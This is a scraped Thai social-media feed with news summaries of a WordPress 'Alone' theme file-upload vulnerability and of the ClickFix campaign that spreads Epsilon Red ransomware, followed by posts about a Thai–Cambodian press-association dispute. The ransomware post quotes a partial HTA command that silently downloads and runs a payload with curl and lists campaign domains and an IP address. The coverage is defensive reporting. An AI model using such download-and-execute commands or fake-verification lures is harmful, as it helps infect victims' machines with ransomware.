    🎙️ เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ: - สร้างบัญชีแอดมินปลอม - อัปโหลดมัลแวร์ - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น ✅ ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ➡️ คะแนนความรุนแรง 9.8/10 ➡️ เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล ✅ ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ➡️ เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป ➡️ ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว ➡️ เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025 ➡️ ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip ✅ แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ ➡️ ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย ➡️ อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน ✅ ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก ➡️ มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery ➡️ เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร ‼️ หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที ⛔ ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน ⛔ อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้ ‼️ การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ ⛔ แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด ⛔ อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก ‼️ ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน ⛔ เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins ⛔ ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด ‼️ การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก ⛔ ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่ ⛔ ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    0 ความคิดเห็น 0 การแบ่งปัน 129 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 107 มุมมอง 0 รีวิว
  • เบรกสัมพันธ์สื่อกัมพูชา ส่อรับใช้ 'ฮุน มาเน็ต'

    3 องค์กรวิชาชืพสื่อ ได้แก่ สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย (TJA) สมาคมผู้ผลิตข่าวออนไลน์ (SONP) และสหภาพแรงงานกลางสื่อมวลชนไทย (NUJT) ออกแถลงการณ์เรียกร้องสมาคมนักข่าวกัมพูชา (Club of Cambodian Journalists หรือ CCJ) ตรวจสอบการทำหน้าที่ของสื่อมวลชนในประเทศอย่างจริงจัง เพื่อจัดการปัญหาข่าวปลอมและข่าวบิดเบือน โดยมีข้อเรียกร้อง 3 ข้อ ได้แก่

    1. หยุดแทรกแซงกิจการภายในของสื่อมวลชนไทย ให้ตรวจสอบจริยธรรมสื่อกัมพูชาอย่างเข้มแข็ง ปราศจากการครอบงำ

    2. ให้ CCJ มุ่งมั่นจัดการปัญหาข่าวปลอมและข้อมูลบิดเบือน ที่มีต้นทางแพร่กระจายในโลกออนไลน์จากกัมพูชาอย่างเป็นรูปธรรม เนื่องจากตรวจพบข้อมูลบิดเบือนจำนวนมาก

    3. ยืนยันว่าสื่อมวลชนไทยมีระบบกำกับดูแลกันเองด้านจริยธรรม ยึดมั่นและเคารพในสิทธิเสรีภาพ ยืนยันเจตนารมณ์รายงานข่าวตามหลักจริยธรรม เป็นกลาง ครบถ้วนรอบด้าน ไม่ยุยงให้เกลียดชัง ต้องการให้เกิดสันติภาพแท้จริงและยั่งยืน

    ในตอนท้ายระบุว่า เนื่องจากการออกแถลงการณ์ของ CCJ หมิ่นเหม่ต่อการเป็นกระบอกเสียงของรัฐบาลกัมพูชา (นายฮุน มาเน็ต) มากกว่าการทำหน้าที่สื่อ ดังนั้นสมาคมนักข่าวฯ ซึ่งมีบันทึกความเข้าใจ (MOU) ร่วมกัน จึงจำเป็นต้องระงับความสัมพันธ์กับ CCJ ชั่วคราว จนกว่าสถานการณ์จะกลับสู่ภาวะปกติ

    ก่อนหน้านี้ CCJ ออกแถลงการณ์ทำทีเรียกร้องให้สื่อมวลชนไทย ปฎิบัติตามมาตรฐานวิชาชีพอย่างเคร่งครัด ตรวจสอบแหล่งข้อมูลรอบคอบและรายงานอย่างมีความรับผิดชอบ พร้อมทั้งขอให้มีบทบาทลดความตึงเครียด ด้วยการนำเสนอข่าวที่ไม่ยุยงปลุกปั่นชาตินิยมหรือเชื้อชาติ หันมาเน้นส่งเสริมบทสนทนาและความร่วมมือในทางที่สร้างสรรค์ระหว่างสองประเทศ โดยกล่าวหาว่าสื่อมวลชนไทย 2 สำนักเผยแพร่ข้อมูลเท็จ ระบุชื่อข่าวสด สื่อในเครือมติชน และ The Nation Thailand สื่อออนไลน์ภาษาอังกฤษของเนชั่นกรุ๊ป

    แถลงการณ์นี้มีนัยยะโจมตีและดิสเครดิตสื่อมวลชนที่มีผู้ติดตามเป็นอันดับต้นของประเทศ โดยเฉพาะสื่อภาคภาษาอังกฤษที่เปรียบเสมือนหน้าต่างของโลก ขณะที่ผ่านมาสื่อออนไลน์ไทยโดยเฉพาะเว็บไซต์ The Nation Thailand และ Bangkok Post ถูกโจมตีทางไซเบอร์มากกว่า 250 ล้านครั้ง

    อีกด้านหนึ่ง แถลงการณ์โต้กลับของ 3 สมาคมสื่อไทยระบุว่าที่ผ่านมาสื่อกัมพูชาเผยแพร่ข้อมูลบิดเบือนจำนวนมาก อาทิ อ้างว่าเครื่องบิน F-16 ของไทยทิ้งสารเคมีลงในกัมพูชา, กล่าวหาว่าไทยใช้เครื่องบิน F-16 ทิ้งระเบิด MK ซึ่งมีอำนาจทำลายล้างสูงใส่บ้านเรือนประชาชนชาวกัมพูชา, ปล่อยข่าวว่า พล.ท.บุญสิน พาดกลาง แม่ทัพภาคที่ 2 เสียชีวิต เป็นต้น

    #Newskit
    เบรกสัมพันธ์สื่อกัมพูชา ส่อรับใช้ 'ฮุน มาเน็ต' 3 องค์กรวิชาชืพสื่อ ได้แก่ สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย (TJA) สมาคมผู้ผลิตข่าวออนไลน์ (SONP) และสหภาพแรงงานกลางสื่อมวลชนไทย (NUJT) ออกแถลงการณ์เรียกร้องสมาคมนักข่าวกัมพูชา (Club of Cambodian Journalists หรือ CCJ) ตรวจสอบการทำหน้าที่ของสื่อมวลชนในประเทศอย่างจริงจัง เพื่อจัดการปัญหาข่าวปลอมและข่าวบิดเบือน โดยมีข้อเรียกร้อง 3 ข้อ ได้แก่ 1. หยุดแทรกแซงกิจการภายในของสื่อมวลชนไทย ให้ตรวจสอบจริยธรรมสื่อกัมพูชาอย่างเข้มแข็ง ปราศจากการครอบงำ 2. ให้ CCJ มุ่งมั่นจัดการปัญหาข่าวปลอมและข้อมูลบิดเบือน ที่มีต้นทางแพร่กระจายในโลกออนไลน์จากกัมพูชาอย่างเป็นรูปธรรม เนื่องจากตรวจพบข้อมูลบิดเบือนจำนวนมาก 3. ยืนยันว่าสื่อมวลชนไทยมีระบบกำกับดูแลกันเองด้านจริยธรรม ยึดมั่นและเคารพในสิทธิเสรีภาพ ยืนยันเจตนารมณ์รายงานข่าวตามหลักจริยธรรม เป็นกลาง ครบถ้วนรอบด้าน ไม่ยุยงให้เกลียดชัง ต้องการให้เกิดสันติภาพแท้จริงและยั่งยืน ในตอนท้ายระบุว่า เนื่องจากการออกแถลงการณ์ของ CCJ หมิ่นเหม่ต่อการเป็นกระบอกเสียงของรัฐบาลกัมพูชา (นายฮุน มาเน็ต) มากกว่าการทำหน้าที่สื่อ ดังนั้นสมาคมนักข่าวฯ ซึ่งมีบันทึกความเข้าใจ (MOU) ร่วมกัน จึงจำเป็นต้องระงับความสัมพันธ์กับ CCJ ชั่วคราว จนกว่าสถานการณ์จะกลับสู่ภาวะปกติ ก่อนหน้านี้ CCJ ออกแถลงการณ์ทำทีเรียกร้องให้สื่อมวลชนไทย ปฎิบัติตามมาตรฐานวิชาชีพอย่างเคร่งครัด ตรวจสอบแหล่งข้อมูลรอบคอบและรายงานอย่างมีความรับผิดชอบ พร้อมทั้งขอให้มีบทบาทลดความตึงเครียด ด้วยการนำเสนอข่าวที่ไม่ยุยงปลุกปั่นชาตินิยมหรือเชื้อชาติ หันมาเน้นส่งเสริมบทสนทนาและความร่วมมือในทางที่สร้างสรรค์ระหว่างสองประเทศ โดยกล่าวหาว่าสื่อมวลชนไทย 2 สำนักเผยแพร่ข้อมูลเท็จ ระบุชื่อข่าวสด สื่อในเครือมติชน และ The Nation Thailand สื่อออนไลน์ภาษาอังกฤษของเนชั่นกรุ๊ป แถลงการณ์นี้มีนัยยะโจมตีและดิสเครดิตสื่อมวลชนที่มีผู้ติดตามเป็นอันดับต้นของประเทศ โดยเฉพาะสื่อภาคภาษาอังกฤษที่เปรียบเสมือนหน้าต่างของโลก ขณะที่ผ่านมาสื่อออนไลน์ไทยโดยเฉพาะเว็บไซต์ The Nation Thailand และ Bangkok Post ถูกโจมตีทางไซเบอร์มากกว่า 250 ล้านครั้ง อีกด้านหนึ่ง แถลงการณ์โต้กลับของ 3 สมาคมสื่อไทยระบุว่าที่ผ่านมาสื่อกัมพูชาเผยแพร่ข้อมูลบิดเบือนจำนวนมาก อาทิ อ้างว่าเครื่องบิน F-16 ของไทยทิ้งสารเคมีลงในกัมพูชา, กล่าวหาว่าไทยใช้เครื่องบิน F-16 ทิ้งระเบิด MK ซึ่งมีอำนาจทำลายล้างสูงใส่บ้านเรือนประชาชนชาวกัมพูชา, ปล่อยข่าวว่า พล.ท.บุญสิน พาดกลาง แม่ทัพภาคที่ 2 เสียชีวิต เป็นต้น #Newskit
    0 ความคิดเห็น 0 การแบ่งปัน 167 มุมมอง 0 รีวิว
  • สมาคมนักข่าวฯ สมาคมผู้ผลิตข่าวออนไลน์ และสหภาพแรงงานกลางสื่อมวลชนไทย รวมพลังแถลงการณ์ร่วม ตอบโต้สมาคมนักข่าวกัมพูชาอย่างดุเดือด หลังถูกกล่าวหาว่าสื่อไทยขาดจริยธรรมในการรายงานข่าวชายแดน ชี้เป็นการดูหมิ่นที่ยอมรับไม่ได้ พร้อมเรียกร้องให้ CCJ ตรวจสอบข่าวปลอม-ข้อมูลบิดเบือนภายในประเทศตนเองอย่างจริงจัง ก่อนประกาศระงับความร่วมมือในฐานะพันธมิตรสื่อ จนกว่าสถานการณ์จะคลี่คลาย

    อ่านต่อ..https://news1live.com/detail/9680000072588

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    สมาคมนักข่าวฯ สมาคมผู้ผลิตข่าวออนไลน์ และสหภาพแรงงานกลางสื่อมวลชนไทย รวมพลังแถลงการณ์ร่วม ตอบโต้สมาคมนักข่าวกัมพูชาอย่างดุเดือด หลังถูกกล่าวหาว่าสื่อไทยขาดจริยธรรมในการรายงานข่าวชายแดน ชี้เป็นการดูหมิ่นที่ยอมรับไม่ได้ พร้อมเรียกร้องให้ CCJ ตรวจสอบข่าวปลอม-ข้อมูลบิดเบือนภายในประเทศตนเองอย่างจริงจัง ก่อนประกาศระงับความร่วมมือในฐานะพันธมิตรสื่อ จนกว่าสถานการณ์จะคลี่คลาย อ่านต่อ..https://news1live.com/detail/9680000072588 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 419 มุมมอง 0 รีวิว
Pages Boosts